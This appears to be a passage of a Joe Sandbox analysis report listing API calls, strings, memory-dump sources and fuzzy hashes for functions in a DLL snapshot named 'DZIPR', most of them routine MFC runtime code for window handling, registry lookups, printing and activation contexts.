                                        • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6FE28547
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                        • API String ID: 667068680-2424895508
                                        • Opcode ID: 0f6dc91dd259799f44a4849fc475d975dd7b14532d83fa41cf6766f98270edce
                                        • Instruction ID: 06e96aafec5c18d45edd19c9b3fe3ab3147ef39338739c8dcf46bddc4e118dd5
                                        • Opcode Fuzzy Hash: 0f6dc91dd259799f44a4849fc475d975dd7b14532d83fa41cf6766f98270edce
                                        • Instruction Fuzzy Hash: 661198B684DE55AFCF14AF559889406BFE69B87328724043FE108C7310E67196A0CB51
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32,6FE2A6B6), ref: 6FE2A5AA
                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FE2A5CB
                                        • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FE2A5DD
                                        • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FE2A5EF
                                        • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FE2A601
                                          • Part of subcall function 6FE26DC1: __CxxThrowException@8.LIBCMT ref: 6FE26DD7
                                          • Part of subcall function 6FE26DC1: __EH_prolog3.LIBCMT ref: 6FE26DE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                        • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                        • API String ID: 417325364-2424895508
                                        • Opcode ID: 5331b4b9e69dcda8d02f0f1cd8d89eb9be7668e19b95dda37c3be4be2e28f9fa
                                        • Instruction ID: 4b2ccf6bc9bde6a8e67d3e0c3eb2ed741215cec0bcd01b194fe65a7017d30c89
                                        • Opcode Fuzzy Hash: 5331b4b9e69dcda8d02f0f1cd8d89eb9be7668e19b95dda37c3be4be2e28f9fa
                                        • Instruction Fuzzy Hash: B6F0FE7880DE35AFCF456FB198155057EAEA787239B10441FA908D2210E7729138CF81
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __wcsdup$ExtensionFileFindModuleNamePath
                                        • String ID: .CHM$.HLP$.INI
                                        • API String ID: 2477486372-4017452060
                                        • Opcode ID: c57a78769a088a88151439f19f2fdead7da6d2f810295b545a12466dd55c8b86
                                        • Instruction ID: 71beb688aa88b39e5fb792a82a3b3081c6bf245c662fb1f283dc9755a3f09a83
                                        • Opcode Fuzzy Hash: c57a78769a088a88151439f19f2fdead7da6d2f810295b545a12466dd55c8b86
                                        • Instruction Fuzzy Hash: 414184B1A007199BDB20DB79CC44B8ABBFDAF45328F2009AE9545D7290FF31E944CB51
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6FE31868
                                        • GetPropW.USER32(?,AfxOldWndProc423), ref: 6FE31877
                                        • CallWindowProcW.USER32(?,?,00000110,?,00000000), ref: 6FE318D1
                                          • Part of subcall function 6FE30C2C: GetWindowRect.USER32(?,10000000), ref: 6FE30C56
                                        • SetWindowLongW.USER32(?,000000FC,?), ref: 6FE318F8
                                        • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6FE31900
                                        • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6FE31907
                                        • GlobalDeleteAtom.KERNEL32(?), ref: 6FE31911
                                        • CallWindowProcW.USER32(?,?,?,?,00000000), ref: 6FE31965
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                        • String ID: AfxOldWndProc423
                                        • API String ID: 2109165785-1060338832
                                        • Opcode ID: f4a50193dd2fc54d45186df88c38a89bbc06faea58a6c3cad93757856e8ccab9
                                        • Instruction ID: e98bb50ed152fe313d99765cfc65ba2eb3e9e78b4906c6fe96b9be9d21fd4729
                                        • Opcode Fuzzy Hash: f4a50193dd2fc54d45186df88c38a89bbc06faea58a6c3cad93757856e8ccab9
                                        • Instruction Fuzzy Hash: 37318132C0422AABCF019FE4CD4DDBF7EB9AF46319F10051DF601A6190C7399A21DBA1
                                        APIs
                                        • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6FE21BE9,?,?,?,?), ref: 6FE21C39
                                        • GetLastError.KERNEL32(?,?,?,?,?,6FE21BE9,?,?,?,?), ref: 6FE21C48
                                        • __aullrem.LIBCMT ref: 6FE21C60
                                        • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6FE21CE8
                                        • _memset.LIBCMT ref: 6FE21CF5
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6FE21BE9,?,?,?,?), ref: 6FE21D07
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                                        • String ID:
                                        • API String ID: 123228641-0
                                        • Opcode ID: 458aefc36db192ab93d9388b9bee3aa30543b5fabed8bfe77a2a585cf9a6fe00
                                        • Instruction ID: 3cad4af13991ad7dafdd506b96f93acda8631ef60d708c1dbafeb59accce8cd7
                                        • Opcode Fuzzy Hash: 458aefc36db192ab93d9388b9bee3aa30543b5fabed8bfe77a2a585cf9a6fe00
                                        • Instruction Fuzzy Hash: 5E516F75A08701AFD740DE69C840B9BBBE8FF88764F10492DF958D7340E775EA058BA2
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6FE2BE14
                                        • EnterCriticalSection.KERNEL32(?,00000010,6FE2C0D0,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BE25
                                        • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BE43
                                        • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?), ref: 6FE2BE77
                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BEE3
                                        • _memset.LIBCMT ref: 6FE2BF02
                                        • TlsSetValue.KERNEL32(?,00000000,?), ref: 6FE2BF13
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BF34
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                        • String ID:
                                        • API String ID: 1891723912-0
                                        • Opcode ID: 58c920a574c04656a7f39442924efb753ec110640dd99daff61a873b80e9acb0
                                        • Instruction ID: 16fd871074a5c79376ac71033c94067a305d308cbd2ef3d9e6811291cfa41824
                                        • Opcode Fuzzy Hash: 58c920a574c04656a7f39442924efb753ec110640dd99daff61a873b80e9acb0
                                        • Instruction Fuzzy Hash: 9E315071904605AFDB10AF24CC85C5ABFF5FF05324B30C52EE65597690EB31AA55CF90
                                        APIs
                                          • Part of subcall function 6FE2815A: GetParent.USER32(?), ref: 6FE281AE
                                          • Part of subcall function 6FE2815A: GetLastActivePopup.USER32(?), ref: 6FE281BF
                                          • Part of subcall function 6FE2815A: IsWindowEnabled.USER32(?), ref: 6FE281D3
                                          • Part of subcall function 6FE2815A: EnableWindow.USER32(?,00000000), ref: 6FE281E6
                                        • EnableWindow.USER32(?,00000001), ref: 6FE28247
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 6FE2825B
                                        • GetCurrentProcessId.KERNEL32(?,?), ref: 6FE28265
                                        • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FE2827D
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FE282F9
                                        • EnableWindow.USER32(00000000,00000001), ref: 6FE28340
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                        • String ID: 8mo
                                        • API String ID: 1877664794-4096906208
                                        • Opcode ID: 01c730d764e7715bea74324069090027712b60ca7c429f7f6936c899ead56bfc
                                        • Instruction ID: 07cd4f65b7a0327147b078633784f6d6796b817c65291934ee783511cdda9ddf
                                        • Opcode Fuzzy Hash: 01c730d764e7715bea74324069090027712b60ca7c429f7f6936c899ead56bfc
                                        • Instruction Fuzzy Hash: 34417172A44A189BDB109F648C88BDA7FF4FF45714F24055BE915E6280E770EB918B90
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FE2DED6
                                        • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FE2DF00
                                        • GetSystemMetrics.USER32(00000000), ref: 6FE2DF17
                                        • GetSystemMetrics.USER32(00000001), ref: 6FE2DF1E
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FE2DF49
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                        • String ID: B$DISPLAY
                                        • API String ID: 381819527-3316187204
                                        • Opcode ID: b32352da4e4783692a0aa8316d96ed2c92a7a38c282ee5a82b4d5f4e60da04d3
                                        • Instruction ID: 567bd64aee3b35be2b5e14a2ae00b2534e73f39f2af5b679e4f4eb07b445a7cf
                                        • Opcode Fuzzy Hash: b32352da4e4783692a0aa8316d96ed2c92a7a38c282ee5a82b4d5f4e60da04d3
                                        • Instruction Fuzzy Hash: 2C21B875504620ABEF209F148C44B5B7FEAFF46764F214126FE189B284E6B0D551CBA1
                                        APIs
                                        • GlobalLock.KERNEL32(?), ref: 6FE288E7
                                        • lstrcmpW.KERNEL32(00000000,?), ref: 6FE288F4
                                        • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6FE28906
                                        • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FE28926
                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6FE2892E
                                        • GlobalLock.KERNEL32(00000000), ref: 6FE28938
                                        • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6FE28945
                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6FE2895D
                                          • Part of subcall function 6FE2DAD1: GlobalFlags.KERNEL32(?), ref: 6FE2DAE0
                                          • Part of subcall function 6FE2DAD1: GlobalUnlock.KERNEL32(?), ref: 6FE2DAF2
                                          • Part of subcall function 6FE2DAD1: GlobalFree.KERNEL32(?), ref: 6FE2DAFD
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                        • String ID:
                                        • API String ID: 168474834-0
                                        • Opcode ID: bffbbc069711c388511a6f1401e76f466c9faaf4622076d6e99386b10937e07f
                                        • Instruction ID: 043194e3e0b6ae878e3faaf2355835e5f277cd9245b58cddbc06d77aff492420
                                        • Opcode Fuzzy Hash: bffbbc069711c388511a6f1401e76f466c9faaf4622076d6e99386b10937e07f
                                        • Instruction Fuzzy Hash: AF116D71504A04BBDB12ABA5CC48DAF7FEDFB85705B20041EFA05D6160E731EA11E760
                                        APIs
                                        • GetSystemMetrics.USER32(0000000B), ref: 6FE2CD75
                                        • GetSystemMetrics.USER32(0000000C), ref: 6FE2CD7C
                                        • GetSystemMetrics.USER32(00000002), ref: 6FE2CD83
                                        • GetSystemMetrics.USER32(00000003), ref: 6FE2CD8D
                                        • GetDC.USER32(00000000), ref: 6FE2CD97
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 6FE2CDA8
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FE2CDB0
                                        • ReleaseDC.USER32(00000000,00000000), ref: 6FE2CDB8
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1151147025-0
                                        • Opcode ID: 3cc667d606ff9daad5f88bd94a7e5fc50e9be2977ecfb566fae5bc49fc04b8c2
                                        • Instruction ID: fa1bcede52aae8dbe9c6d9a8de72fb841fc12c4cf746d71c8f3b51916236912e
                                        • Opcode Fuzzy Hash: 3cc667d606ff9daad5f88bd94a7e5fc50e9be2977ecfb566fae5bc49fc04b8c2
                                        • Instruction Fuzzy Hash: F9F06DB1E40B14BAEB106B728C49F167FA8EB42731F00851BE6048B2C0CAB698258FD0
                                        APIs
                                        • _memset.LIBCMT ref: 6FE3029B
                                        • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FE302C4
                                        • GetWindowLongW.USER32(?,000000FC), ref: 6FE302D6
                                        • GetWindowLongW.USER32(?,000000FC), ref: 6FE302E7
                                        • SetWindowLongW.USER32(?,000000FC,?), ref: 6FE30303
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend_memset
                                        • String ID: ,
                                        • API String ID: 2997958587-3772416878
                                        • Opcode ID: 87adb1a11b9f2100d79ccc2403dfeee82f5d3cc7c7ad8196e0e719156ebff141
                                        • Instruction ID: ef83868935242bdd9151de463603c56e6fa537b97c1ec26f83d6362daf28f050
                                        • Opcode Fuzzy Hash: 87adb1a11b9f2100d79ccc2403dfeee82f5d3cc7c7ad8196e0e719156ebff141
                                        • Instruction Fuzzy Hash: 7E319132A007209FDB10AF75C888A5DBFF5BF89318F21152DE65697692EB30F404CB54
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6FE2A20A
                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FE2A2F0
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FE2A30D
                                        • RegCloseKey.ADVAPI32(?), ref: 6FE2A32D
                                        • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FE2A348
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CloseEnumH_prolog3_OpenQueryValue
                                        • String ID: Software\
                                        • API String ID: 1666054129-964853688
                                        • Opcode ID: 52e2e393da1cf4daa9010467f57e2680b870b25ee7ed36aa1a5d2a2acbe27ed5
                                        • Instruction ID: bad63c613c1eafd6886055e3e6fda8a26d9b0be7b8ad698f32ab431e7982a701
                                        • Opcode Fuzzy Hash: 52e2e393da1cf4daa9010467f57e2680b870b25ee7ed36aa1a5d2a2acbe27ed5
                                        • Instruction Fuzzy Hash: D3419731941619ABCB21EBA4DC88EDEBBF9AF49714F2006DDE015E2190EB759F84CF50
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6FE2A08C
                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FE2A11A
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FE2A13D
                                          • Part of subcall function 6FE2A02D: __EH_prolog3.LIBCMT ref: 6FE2A034
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: EnumH_prolog3H_prolog3_catch_Open
                                        • String ID: Software\Classes\
                                        • API String ID: 3518408925-1121929649
                                        • Opcode ID: c1151283ab5027f21346480229af26de35f33170ed29c627a8472a8e85e1a23d
                                        • Instruction ID: 3c662aed452db0936f1f7f08e4164f5b4e89c9521405ecdeaea4a20e6645f809
                                        • Opcode Fuzzy Hash: c1151283ab5027f21346480229af26de35f33170ed29c627a8472a8e85e1a23d
                                        • Instruction Fuzzy Hash: 22319571C44228AADB21ABE4DC48BDDBFB5AF09324F2402DAE85567290E7745F84DF50
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FE2D0AE
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FE2D0D1
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FE2D0ED
                                        • RegCloseKey.ADVAPI32(?), ref: 6FE2D0FD
                                        • RegCloseKey.ADVAPI32(?), ref: 6FE2D107
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CloseCreate$Open
                                        • String ID: software
                                        • API String ID: 1740278721-2010147023
                                        • Opcode ID: 6d011b16b8e85efc74b1fc8470a0d9d688f86aeb31f036814c4e069ecec35e2d
                                        • Instruction ID: 97c564a4e824c944b2e87e3678eb3b2e5e8a8177de97d236f80475ca3365ebe4
                                        • Opcode Fuzzy Hash: 6d011b16b8e85efc74b1fc8470a0d9d688f86aeb31f036814c4e069ecec35e2d
                                        • Instruction Fuzzy Hash: 35111C76D00118BB8B21DB86CD44CDFBFBEEF86714F10006AA604A2111E6319A05DBA0
                                        APIs
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6FE2BEB5
                                        • __CxxThrowException@8.LIBCMT ref: 6FE2BEBF
                                          • Part of subcall function 6FE3527B: RaiseException.KERNEL32(?,00000003,000000FF,6FE2279F), ref: 6FE352BD
                                        • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?), ref: 6FE2BED6
                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BEE3
                                          • Part of subcall function 6FE26D89: __CxxThrowException@8.LIBCMT ref: 6FE26D9F
                                        • _memset.LIBCMT ref: 6FE2BF02
                                        • TlsSetValue.KERNEL32(?,00000000,?), ref: 6FE2BF13
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,6FE2AF00,6FE26DDD,6FE2A591,6FE22BC2,?,?,?,?,?), ref: 6FE2BF34
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
